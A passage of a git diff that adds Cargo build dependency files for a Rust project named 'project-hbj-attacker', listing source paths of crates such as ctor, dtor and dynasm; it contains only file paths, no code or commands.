+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libcfg_if-43f8c950438ad461.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/ctor-764f90eab28ab065.d b/01/project-hbj-attacker/target/debug/deps/ctor-764f90eab28ab065.d
new file mode 100644
index 0000000..1f5c1f0
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/ctor-764f90eab28ab065.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/ctor-764f90eab28ab065.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libctor-764f90eab28ab065.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libctor-764f90eab28ab065.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/ctor-c7993d1f929e2c48.d b/01/project-hbj-attacker/target/debug/deps/ctor-c7993d1f929e2c48.d
new file mode 100644
index 0000000..86e91f2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/ctor-c7993d1f929e2c48.d
@@ -0,0 +1,6 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/ctor-c7993d1f929e2c48.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libctor-c7993d1f929e2c48.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-0.6.0/src/macros/mod.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/ctor_proc_macro-6f45fcea41a18c46.d b/01/project-hbj-attacker/target/debug/deps/ctor_proc_macro-6f45fcea41a18c46.d
new file mode 100644
index 0000000..f79634d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/ctor_proc_macro-6f45fcea41a18c46.d
@@ -0,0 +1,6 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/ctor_proc_macro-6f45fcea41a18c46.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libctor_proc_macro-6f45fcea41a18c46.so: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/ctor-proc-macro-0.0.7/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/dtor-868de25bd3f2f018.d b/01/project-hbj-attacker/target/debug/deps/dtor-868de25bd3f2f018.d
new file mode 100644
index 0000000..74f0138
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/dtor-868de25bd3f2f018.d
@@ -0,0 +1,9 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/dtor-868de25bd3f2f018.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdtor-868de25bd3f2f018.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdtor-868de25bd3f2f018.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/dtor-f50197c50db89aed.d b/01/project-hbj-attacker/target/debug/deps/dtor-f50197c50db89aed.d
new file mode 100644
index 0000000..cbe74d1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/dtor-f50197c50db89aed.d
@@ -0,0 +1,7 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/dtor-f50197c50db89aed.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdtor-f50197c50db89aed.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/macros/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-0.1.0/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/dtor_proc_macro-6b6e7d2721848f5f.d b/01/project-hbj-attacker/target/debug/deps/dtor_proc_macro-6b6e7d2721848f5f.d
new file mode 100644
index 0000000..b3dfbee
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/dtor_proc_macro-6b6e7d2721848f5f.d
@@ -0,0 +1,6 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/dtor_proc_macro-6b6e7d2721848f5f.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/../README.md
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdtor_proc_macro-6b6e7d2721848f5f.so: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/../README.md
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dtor-proc-macro-0.0.6/src/../README.md:
diff --git a/01/project-hbj-attacker/target/debug/deps/dynasm-ce248869b1be4d7e.d b/01/project-hbj-attacker/target/debug/deps/dynasm-ce248869b1be4d7e.d
new file mode 100644
index 0000000..62c6774
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/dynasm-ce248869b1be4d7e.d
@@ -0,0 +1,34 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/dynasm-ce248869b1be4d7e.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/x64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/aarch64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/encoding_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/riscvdata.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/directive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/serialize.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/parse_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/gen_opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/opmap.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdynasm-ce248869b1be4d7e.so: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/x64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/aarch64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/encoding_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/riscvdata.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/directive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/serialize.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/parse_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/gen_opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/opmap.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/debug.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/x64data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/ast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/matching.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/compiler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/aarch64data.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/encoding_helpers.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/debug.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/riscvdata.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/ast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/matching.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/compiler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/debug.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/directive.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/serialize.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/parse_helpers.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/gen_opmap.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/opmap.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/opmap.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/dynasm-d04518e4fa1681fa.d b/01/project-hbj-attacker/target/debug/deps/dynasm-d04518e4fa1681fa.d
new file mode 100644
index 0000000..802ff2f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/dynasm-d04518e4fa1681fa.d
@@ -0,0 +1,34 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/dynasm-d04518e4fa1681fa.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/x64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/aarch64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/encoding_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/riscvdata.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/directive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/serialize.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/parse_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/gen_opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/opmap.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libdynasm-d04518e4fa1681fa.so: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/x64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/aarch64data.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/encoding_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/riscvdata.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/ast.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/matching.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/compiler.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/debug.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/directive.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/serialize.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/parse_helpers.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/gen_opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/aarch64/opmap.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/riscv/opmap.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/common.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/ast.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/compiler.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/dynasm-4.0.1/src/arch/x64/parser.rs:
